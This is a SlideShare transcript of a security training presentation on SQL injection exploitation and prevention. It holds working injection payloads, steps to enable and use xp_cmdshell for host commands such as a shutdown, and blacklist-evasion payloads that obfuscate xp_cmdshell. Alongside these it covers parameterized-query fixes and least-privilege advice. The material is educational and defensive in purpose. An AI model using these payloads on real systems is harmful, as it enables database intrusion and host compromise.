Devouring Security Sqli Exploitation and Prevention

2,419 views

Published on

Devouring Security Sqli is an exploitation and prevention presentation that I did a while back. The presentation accompanies a screen recording which could be located at http://vimeo.com/gmaran23

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,419
On SlideShare
0
From Embeds
0
Number of Embeds
318
Actions
Shares
0
Downloads
28
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Devouring Security Sqli Exploitation and Prevention

  1. 1. Devouring Security Sqli Exploitation & prevention Part 1 & 2 Marudhamaran Gunasekaran Watch the screen recording of this presentation at Devouring Security – Sql Injection Part 1 - http://vimeo.com/83658524 Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464
  2. 2. Security Feeling Reality Trade offs Wisdom Ignorance is no excuse
  3. 3. Disclaimer Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.
  4. 4. Sqli – Media coverage http://pastebin.com/HUjZPaF3
  5. 5. Sqli – Media coverage http://thepiratebay.se/torrent/6443601
  6. 6. http://www.bloomberg.com/news/2013-01-24/sony-fined-394-000-over-2011-hacker-attack-on-playstation-data.html Sqli – Media coverage
  7. 7. http://www.eteknix.com/turkish-hackers-claim-to-have-leaked-40000-sony-italy-account-details/ Sqli – Media coverage
  8. 8. http://news.techworld.com/security/3331283/barclays-97-percent-of-data-breaches-still-due-to-sql-injection/ Sqli – Media coverage
  9. 9. Sqli – MediaCoverage
  10. 10. Sqli – Why does it exist? Yeah! I can develop/deploy without restrictions , I have full access. Thanks bro! I am your uninvited database administrator now. I owe you, and your data. I like them admin rights
  11. 11. Sqli – Why does it exist? Conglomeration of Sensitive Data Would you keep all your belongings in your home, or would you keep some in your safe deposit box? Blindly Trusting Unsanitized User Input "Over thousands of queries in a moderate- to large-size application, that 2% can result in a handful of SQL injections," Chou says. "All an attacker needs to do is find one of these, and you'll have millions of records stolen and a headline in Dark Reading.“
  12. 12. Sqli – Why does it exist? • It’s not always about a developer knowing better, there are tons and tons of legacy code • Remember, DBA’s write SQL too • No strict access control policies • Windows based/Desktop based applications are directly ported to the web • Developer’s still don’t know the complete truths about Sqli
  13. 13. Sqli 101 ../Products?name=rat SELECT 1 FROM Products WHERE ProductName = ‘rat‘ ../Products?name=rat‘ or 1=1 -SELECT 1 FROM Products WHERE ProductName = ‘rat’ or 1=1 -- ’ or true
  14. 14. Sqli 101 • http://sqli:8020/Sqli/ • http://localhost/WebGoat/attack? Screen=147&menu=1100&stage=1
  15. 15. Sqli U
  16. 16. Sqli U http://sqli:8020/Sqli/ProductSearch
  17. 17. Sqli E
  18. 18. Sqli E http://sqli:8020/SqliErrorRiddle/
  19. 19. Sqli E -- table enumerator SELECT TOP 1 Convert(INT, NAME) FROM sys.tables WHERE object_id = ( SELECT TOP 1 object_id FROM ( SELECT TOP 2 object_id FROM sys.tables ORDER BY object_id ) AS TEMP ORDER BY object_id DESC ) Enumerating in MySQl is very easy with OFFSET.
  20. 20. ORMs and SPs Loopholes http://sqli:8020/SqliORM/ProductSearch
  21. 21. It’s not an ORM’s problem to have you loaded with features ALTER PROCEDURE SearchProducts (@Item VARCHAR(100)) AS BEGIN DECLARE @query VARCHAR(400) SET @query = 'SELECT * FROM Products WHERE ProductName LIKE ''%' + @Item + '%''' PRINT @query EXEC (@query) END GO ---------------------------------------------------------------------------------------------- Execute good EXEC SearchProducts 'chai' GO -- Execute bad EXEC SearchProducts 'chai%'' or 1=1--' GO
  22. 22. Fixing SP Loopholes ALTER PROCEDURE SearchProductsBetter (@Item VARCHAR(200)) AS BEGIN DECLARE @safequery NVARCHAR(400) DECLARE @params NVARCHAR(200) SET @safequery = N'SELECT * FROM Products WHERE ProductName LIKE ''%'' + @param1 + ''%''' SET @params = N'@param1 NVARCHAR(200)‘; EXECUTE SP_EXECUTESQL @safequery ,@params ,@param1 = @Item END GO ---------------------------------------------------------------------------------------------- Execute bad EXEC SearchProductsBetter 'chai%'' or 1=1--' GO
  23. 23. Profiling Host OS • Privilege misuse and rooting
  24. 24. Profiling Host OS -- enable command shell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; -- disable command shell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
  25. 25. Profiling Host OS -- play time! exec xp_cmdshell 'tasklist‘ exec master.dbo.xp_cmdshell 'whoami‘ exec xp_cmdshell 'netsh advfirewall firewall show rule name=all profile=public'
  26. 26. Profiling Host OS -- enumerate and remove trace create table tempsz(temp varchar(MAX));insert into tempsz exec xp_cmdshell 'tasklist';select * from tempsz;drop table tempsz; -- enumerate and leave trace create table tempsz(temp varchar(MAX));insert into tempsz exec xp_cmdshell 'tasklist'; -- get enumerated information and remove trace select temp from tempsz;drop table tempsz;
  27. 27. Profiling Host OS -- schedule a shutdown and send message to the user named maran exec xp_cmdshell 'shutdown -s -t 6000'; exec xp_cmdshell 'msg maran You will be shut down in 100 minutes' -- abort the shutdown and send message to the user named maran exec xp_cmdshell 'shutdown -a'; exec xp_cmdshell 'msg maran I have heard your prayer. You are salvaged'
  28. 28. Profiling Host OS OSCommand_Run in Oracle does the equivalent of xp_cmdshell in Sql server.
  29. 29. Sqli T Just biding time, my friend
  30. 30. Sqli T Oracle DBMS_LOCK.sleep TSql WAIT FOR DELAY MySql BENCHMARK
  31. 31. Sqli B Blind, but I could get by
  32. 32. Sqli B Blind, not as fast, but I could travel miles
  33. 33. IDS Evasive Techniques ‘485’=“485” ‘5’>’1’ “QSNR”=“QSNR” REPLACE('SEL/**/CT', '/**/', '')
  34. 34. Blacklist Filter Evasion ';exec xP_cMdsheLL 'dir';-';ex/**/ec xp_cmds/**/hell 'dir';-- [old versions] ';exec/**/xp_cmdshell/**/'dir';-';Declare @cmd as varchar(3000);Set @cmd = 'x'+'p'+'_'+'c'+'m'+'d'+'s'+'h'+'e'+'l'+'l'+'/**/'+''''+'d'+'i'+'r'+'''';e xec(@cmd);--
  35. 35. Blacklist Filter Evasion Declare @cmd as varchar(3000);Set @cmd =(CHAR(101)+CHAR(120)+CHAR(101)+CHAR(99)+CHAR(32)+CHAR(109)+C HAR(97)+CHAR(115)+CHAR(116)+CHAR(101)+CHAR(114)+CHAR(46)+CHAR (46)+CHAR(120)+CHAR(112)+CHAR(95)+CHAR(99)+CHAR(109)+CHAR(100) +CHAR(115)+CHAR(104)+CHAR(101)+CHAR(108)+CHAR(108)+CHAR(32)+C HAR(39)+CHAR(100)+CHAR(105)+CHAR(114)+CHAR(39)+CHAR(59));EXEC( @cmd);-- EXEC (exec master..xp_cmdshell 'dir')
  36. 36. Sqli Exploitation tools • Sqlmap • sqlninja • Safe3SI • Enema • Havij • Pangolin • BSQL Hacker ……………………. and a lot more
  37. 37. Sqli Exploitation tools Demonstration 1.Safe3SI 2.Enema 3.Sqlmap
  38. 38. Sqli Feeble Fixes Blacklisting is suicide IDSs are not very effective for Sqli
  39. 39. Feeble Fixes Blacklisting (can’t filter all possible dangerous inputs like below) “QSNR”=“QSNR” REPLACE('SEL/**/CT', '/**/', '')
  40. 40. Blacklisting for Death
  41. 41. Blacklisting for Death
  42. 42. Blacklisting for Death
  43. 43. Sqli Prevention
  44. 44. Sqli Prevention Exploitation tools Fuzzers Active/Passive vulnerability scanners
  45. 45. Core Defense Input Validation with Whitelist, Type casting or/and RegEx.
  46. 46. Core Defense Validation with RegEx
  47. 47. Core Defense CREATE PROCEDURE dbo.doQuery (@id NCHAR(4)) AS DECLARE @query NCHAR(64) IF RTRIM(@id) LIKE '[0-9][0-9][0-9][0-9]' BEGIN SELECT @query = 'select ccnum from cust where id = ''' + @id + '''' EXEC @query END RETURN -- Or, better yet, force an interger parameter CREATE PROCEDURE dbo.doQuery(@id smallint)
  48. 48. Core Defense Parametrization a.k.a prepared statements [refer to your framework for support]
  49. 49. Core Defense Encrypt data to prevent disclosure when physical database files are stolen. 1. Encryption does not do a darn thing to protect you from direct Sqli 2. Encryption only protects you from Sqli induced attacks
  50. 50. Core Defense Database user account audits 1. Selective privilege principle 2. Least privilege principle
  51. 51. Code Reviews - Spot and Stop Sqli
  52. 52. Code Reviews - Spot and Stop Sqli
  53. 53. CAT.Net Sqli Scan
  54. 54. CAT.Net Sqli Scan MicrosoftACECodeAnalysisReport.htm
  55. 55. Netsparker community edition
  56. 56. What now? Sqli Cheatsheet http://ferruh.mavituna.com/sql-injectioncheatsheet-oku Dynamic queries in T-SQL http://www.sommarskog.se/dyn-search2005.html http://www.sommarskog.se/dyn-search2008.html
  57. 57. End of the world Watch the screen recording of this presentation at my vimeo channel Devouring Security – Sql Injection Part 1 http://vimeo.com/83658524 Devouring Security – Sql Injection Part 2 – http://vimeo.com/85256464

×